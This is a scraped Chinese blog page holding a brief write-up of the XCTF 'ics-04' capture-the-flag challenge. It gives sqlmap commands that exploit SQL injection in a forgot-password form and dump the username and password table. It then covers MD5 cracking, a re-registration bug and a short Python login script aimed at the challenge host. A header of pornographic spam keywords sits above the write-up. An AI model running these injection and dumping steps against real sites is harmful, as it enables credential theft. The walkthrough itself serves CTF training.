日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

XCTF-高手进阶区:ics-04

發布時間:2023/12/31 编程问答 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XCTF-高手进阶区:ics-04 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

題目:

解題思路:
注入點在忘記密碼處,使用sqlmap一把梭

sqlmap -r 1.txt --dbs --batch sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump


直接解密md5,解密網址:https://www.somd5.com/
然后使用c3tlwDmIn23登錄,即可獲得flag

注:如果md5無法解密還可使用如下方法
1、利用可以重復注冊的漏洞,測試方法,使用c3tlwDmIn23作為用戶名重新注冊,設置自己知道的密碼,然后登陸,即可獲得flag
2、網上還有一種,使用py腳本,但目前無法顯示flag了,只有正確的密碼才可以。經過抓包發現他不是前端md5加密,再和后端數據庫中加密后的密碼進行比對;有可能是后端md5加密,然后再進行比對
貼一下代碼:如果以后有類似題目,可以參考

import requestsurl = 'http://159.138.137.79:61667/login.php' username = 'c3tlwDmIn23' password = '2f8667f381ff50ced6a3edc259260ba9' data = {'username':username,'password':password} req = requests.post(url,data=data) req.encoding='utf-8' print (req.text)

總結

以上是生活随笔為你收集整理的XCTF-高手进阶区:ics-04的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。